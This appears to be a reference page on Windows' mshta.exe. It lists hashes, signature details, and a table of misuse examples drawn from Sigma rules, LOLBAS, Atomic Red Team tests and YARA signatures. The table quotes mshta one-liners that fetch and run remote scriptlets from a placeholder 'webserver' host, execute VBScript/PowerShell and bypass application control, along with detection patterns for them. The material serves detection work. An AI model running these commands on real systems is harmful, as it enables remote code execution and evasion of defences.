mshta.exe

  • File Path: C:\WINDOWS\SysWOW64\mshta.exe
  • Description: Microsoft (R) HTML Application host

Hashes

Type Hash
MD5 7909FE33D4982656286C501DF1375EA0
SHA1 87DD083A4C67F0E105C19469933B5ED13174D7AB
SHA256 9820174C7EC2FC3B3410609045BBD56A8F9D20E6AE52515ABA7C9E6B60312D97
SHA384 50E3B2964414FA59C6708501DED3E8082219E4B0A891B7D21541A218207B7315DECF36E68C2660AE3AFC954466CD6C35
SHA512 D7ADE0F8D08E05A7F9BE248D83336806CE41880F878765727AEC3E132D334B78E144F3C2B243E39E33B50BE851061C2173EC830C7E76949C202FC9A6EB0C1210
SSDEEP 96:j70n5BDz15TFRnfwxVwHXAR2dqF5DWzoJ51tGI4Y6NZbwJXrSF2DJ+PjGGsjEWw9:/A/rQVXM+sY6gJXeFDBWwKLIR
IMP EE4E4A67C3E30B424AA8A1C9C579181F
PESHA1 D1F18A34B8A7840D00060BCA6ADCD9FD39DBBBD7
PE256 B2352DCB3449319838C783DFF2AAFEB0223E97778848586410541D15D4E28894

Runtime Data

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\mshta.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: MSHTA.EXE.MUI
  • Product Name: Internet Explorer
  • Company Name: Microsoft Corporation
  • File Version: 11.00.22000.1 (WinBuild.160101.0800)
  • Product Version: 11.00.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/9820174c7ec2fc3b3410609045bbd56a8f9d20e6ae52515aba7c9e6b60312d97/detection

File Similarity (ssdeep match)

File Score
C:\Windows\SysWOW64\mshta.exe 41
C:\windows\SysWOW64\mshta.exe 38

Possible Misuse

The following table contains possible examples of mshta.exe being misused. While mshta.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\mshta.exe' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml - 'mshta' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml - 'mshta' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\mshta.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\mshta.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'mshta' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\mshta.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\mshta.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\mshta.exe' DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml Payload\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml ScriptBlockText\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_apt_babyshark.yml - powershell.exe mshta.exe http* DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'mshta' DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\mshta.exe' DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_exploit_cve_2017_11882.yml description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml CommandLine\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_lethalhta.yml title: MSHTA Spwaned by SVCHOST DRL 1.0
sigma proc_creation_win_lethalhta.yml description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report DRL 1.0
sigma proc_creation_win_lethalhta.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'mshta' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'mshta' DRL 1.0
sigma proc_creation_win_mshta_javascript.yml title: Mshta JavaScript Execution DRL 1.0
sigma proc_creation_win_mshta_javascript.yml description: Identifies suspicious mshta.exe commands. DRL 1.0
sigma proc_creation_win_mshta_javascript.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml title: MSHTA Spawning Windows Shell DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml description: Detects a Windows command line executable started from MSHTA DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'mshta' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*mshta*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_possible_applocker_bypass.yml #- '\mshta.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml title: Mshta Spawning Windows Shell DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml description: Detects a suspicious child process of a mshta.exe process DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_covenant.yml - 'mshta file.hta' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml title: MSHTA Suspicious Execution 01 DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml title: Suspicious MSHTA Process Patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml description: Detects suspicious mshta process patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - https://www.echotrail.io/insights/search/mshta.exe DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml ImagePath\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
LOLBAS Mshta.yml Name: Mshta.exe  
LOLBAS Mshta.yml - Command: mshta.exe evilfile.hta  
LOLBAS Mshta.yml - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))  
LOLBAS Mshta.yml - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();  
LOLBAS Mshta.yml - Command: mshta.exe "C:\ads\file.txt:file.hta"  
LOLBAS Mshta.yml - Path: C:\Windows\System32\mshta.exe  
LOLBAS Mshta.yml - Path: C:\Windows\SysWOW64\mshta.exe  
LOLBAS Mshta.yml - IOC: mshta.exe executing raw or obfuscated script within the command-line  
LOLBAS Mshta.yml - IOC: DotNet CLR libraries loaded into mshta.exe  
LOLBAS Mshta.yml - IOC: DotNet CLR Usage Log - mshta.exe.log  
LOLBAS Mshta.yml - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct  
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).  
LOLBAS Url.yml Usecase: Invoke an HTML Application via mshta.exe (Default Handler).  
atomic-red-team index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | SSH Authorized Keys | Systemd Timers | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Screensaver | Time Providers CONTRIBUTE A TEST | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md - Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md ## Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md | url | url of payload to execute | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md C:\Windows\system32\cmd.exe /c “mshta.exe javascript:a=GetObject(‘script:#{url}’).Exec();close()” MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md Get-WmiObject win32process | Where-Object {$.CommandLine -like “mshta”} | % { “$(Stop-Process $_.ProcessID)” } | Out-Null MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Stop-Process -name mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md # T1218.005 - Mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md <blockquote>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe javascript:a=(GetObject(‘script:#{file_url}’)).Exec();close(); MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta vbscript:Execute(“CreateObject(““Wscript.Shell””).Run ““powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1”“:close”) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta “#{temp_file}” MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | String | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | Path | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe “about:'" MIT License. © 2018 Red Canary
signature-base apt_babyshark.yar $x2 = /mshta.exe http:\/\/[a-z0-9.\/]{5,30}.hta/ CC BY-NC 4.0
signature-base apt_fin7.yar $x7 = “7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400” ascii /* hex encoded string ‘stem32\mshta.exe#......\Windows\Syst’ */ CC BY-NC 4.0
signature-base apt_leviathan.yar $x2 = “.Run "taskkill /im mshta.exe” ascii CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x1 = “4d534854412e4558452068747470” /* MSHTA.EXE http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x2 = “6d736874612e6578652068747470” /* mshta.exe http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x3 = “6d736874612068747470” /* mshta http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x4 = “4d534854412068747470” /* MSHTA http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $mshta = “mshta” CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar any of ($mshta, $http, $https, $cmd, $pwsh, $exe) and any of ($equation1, $equation2) and $address CC BY-NC 4.0
signature-base exploit_cve_2017_8759.yar $s2 = /<soap:address location=”http[s]?:\/\/[^”]{8,140}mshta.exe”/ ascii wide CC BY-NC 4.0
signature-base gen_mal_scripts.yar description = “Detects MSHTA Bypass” CC BY-NC 4.0
signature-base gen_mal_scripts.yar $s3 = “/c start mshta j” ascii nocase CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.